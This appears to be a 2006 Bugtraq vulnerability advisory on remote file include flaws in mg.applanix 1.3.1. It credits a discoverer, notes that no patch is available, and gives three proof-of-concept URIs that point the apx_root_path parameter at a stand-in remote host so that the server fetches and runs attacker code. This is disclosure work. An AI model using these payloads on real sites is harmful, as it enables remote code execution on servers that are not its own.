MG.Blattl MG.Applanix APX_Root_Path Parameter Multiple Remote File Include Vulnerabilities

Bugtraq ID:	21147
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Nov 17 2006 12:00AM
Updated:	Nov 22 2006 10:35PM
Credit:	v1per-haCker is credited with the discovery of these vulnerabilities.
Vulnerable:	mg.blattl mg.applanix 1.3.1
Not Vulnerable:

MG.Blattl MG.Applanix APX_Root_Path Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs and exploit code are available:

http://www.example.com/path/act/act_check_access.php?apx_root_path=http://www.example2.com/EvElCoDe.txt?
http://www.example.com/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://www.example2.com/EvElCoDe.txt?
http://www.example.com/path/dsp/dsp_bookings.php?apx_root_path=http://www.example2.com/EvElCoDe.txt?

• /data/vulnerabilities/exploits/21147.pl

MG.Blattl MG.Applanix APX_Root_Path Parameter Multiple Remote File Include Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].

MG.Blattl MG.Applanix APX_Root_Path Parameter Multiple Remote File Include Vulnerabilities

References:

• Vendor Homepage (mg.blattl)
  
• mg.applanix <= 1.3.1 Remote File Include Exploit ([email protected])